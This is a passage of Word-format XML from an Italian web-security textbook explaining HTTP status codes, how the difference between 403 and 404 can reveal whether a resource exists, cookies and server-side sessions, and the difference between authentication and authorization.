      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— La risorsa è da un’altra parte, vai lì.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">400 Bad Request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— La tua richiesta è formulata male (sintassi sbagliata, parametri mancanti).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">401 Unauthorized</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Non sei autenticato. Devi fare il login. (Il nome è confuso:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unauthorized</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">letteralmente vuol dire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non autorizzato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ma in HTTP significa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non autenticato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">403 Forbidden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Sei autenticato ma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non hai il permesso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di accedere a questa risorsa. Vedremo nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> che la differenza fra 401 e 403 è cruciale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">404 Not Found</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— La risorsa non esiste.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">500 Internal Server Error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Qualcosa è esploso nel codice del server. Per uno sviluppatore, è il messaggio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vai a guardare i log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per gli studenti di sicurezza c’è un dettaglio molto importante che riprenderemo nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">: la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">differenza fra 403 e 404</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">può essere sfruttata per scoprire risorse esistenti che non dovresti vedere. Se chiedo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/utente/42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e ricevo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">403 Forbidden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ho appena scoperto che l’utente 42 esiste. Se ricevo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">404 Not Found</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non lo so. Le scelte tecniche di codice apparentemente innocue (restituisco 403 o 404?) hanno conseguenze di sicurezza dirette.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="117"/>
    <w:bookmarkStart w:id="121" w:name="cookie-e-sessioni-come-http-ricorda"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="473" w:name="sec_3_6"/>
      <w:r>
        <w:t xml:space="preserve">3.6 Cookie e sessioni: come HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ricorda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="473"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Abbiamo detto che HTTP è stateless: il server non ricorda chi sei fra una richiesta e l’altra. Ma allora come fa un sito a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tenermi loggato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">? Come fa un sito di e-commerce a sapere che il prodotto nel mio carrello è mio e non di un altro visitatore? La risposta è: con i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(e le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sessioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che ci sono dietro).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="118" w:name="cookie-cosa-sono"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cookie: cosa sono</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un piccolo pezzo di testo (al massimo qualche kilobyte) che il server invia al browser, e che il browser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">rinvia automaticamente al server in ogni richiesta successiva</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">verso quello stesso dominio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Schema della vita di un cookie:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Prima richiesta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il browser visita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola.it/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, invia username e password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il server verifica le credenziali, le accetta. Nella risposta, oltre alla pagina HTML, mette un’intestazione speciale:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Cookie: session_id=a1b2c3d4e5f6; Path=/; HttpOnly; Secure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il browser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">memorizza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quel cookie sul disco locale (associato al dominio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola.it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tutte le richieste successive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dello stesso browser verso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola.it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">includeranno automaticamente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie: session_id=a1b2c3d4e5f6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il server, ricevendo il cookie, riconosce:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">ah, questa è la sessione</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">a1b2c3d4e5f6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, corrisponde all’utente Mario Rossi che ha fatto login alle 14:23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’analogia è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">biglietto del guardaroba</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: quando consegni il cappotto al guardaroba di un ristorante, l’addetto ti dà uno scontrino con un numero. Quando esci, mostri lo scontrino, e l’addetto ti restituisce il cappotto giusto. Il guardaroba non ha bisogno di ricordarsi la tua faccia: gli basta il numero sullo scontrino. Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">session_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel cookie è esattamente quel numero.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="118"/>
    <w:bookmarkStart w:id="119" w:name="sessioni-lato-server"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sessioni lato server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il valore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">a1b2c3d4e5f6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da solo non significa nulla: è solo una stringa casuale. Le informazioni vere (chi sei, da quanto tempo sei loggato, cosa hai nel carrello, che ruolo hai) sono memorizzate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dal lato server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, in una struttura chiamata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sessione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, indicizzata da quel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">session_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio concettuale lato server:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sessioni = {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    "a1b2c3d4e5f6": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "utente_id": 42,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "username": "mario",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "ruolo": "cliente",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "scaduta_il": "2026-04-20 22:00:00"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    "z9y8x7w6": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "utente_id": 17,</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Quando arriva una richiesta con il cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">session_id=a1b2c3d4e5f6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, il server cerca quella chiave nella tabella delle sessioni e ne estrae</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">utente_id=42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A quel punto sa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che chi sta parlando è Mario Rossi (ID 42)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🚨</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Conseguenze di sicurezza enormi.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Se un attaccante riesce a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">rubare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il cookie di sessione di un utente — per esempio attraverso un attacco XSS (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) — può inserirlo nel proprio browser e diventare quell’utente,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">senza conoscere la password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il server vede solo il cookie, non chi lo presenta. È esattamente come se rubassi lo scontrino del guardaroba di qualcun altro: presentandolo, riceveresti il suo cappotto. Per questo i cookie di sessione sono uno dei bersagli principali degli attaccanti, e per questo li proteggiamo con i flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="119"/>
    <w:bookmarkStart w:id="120" w:name="differenza-fra-autenticazione-e-sessione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Differenza fra autenticazione e sessione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Autenticazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: l’atto con cui dimostri di essere chi dici di essere (di solito: username + password, eventualmente più un secondo fattore).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sessione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ricordo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">persistente di quella autenticazione, che evita di dover rifare il login a ogni clic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Entrambe sono distinte dall’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">autorizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, che è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ti permetto di fare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">questa specifica cosa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La differenza fra autenticazione e autorizzazione è il cuore del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="120"/>
    <w:bookmarkEnd w:id="121"/>
    <w:bookmarkStart w:id="122" w:name="header-http-importanti"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="474" w:name="sec_3_7"/>
      <w:r>
        <w:t xml:space="preserve">3.7 Header HTTP importanti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="474"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una richiesta o una risposta HTTP può avere decine di intestazioni. Vediamo quelle che incontrerai più spesso.</w:t>
      </w:r>
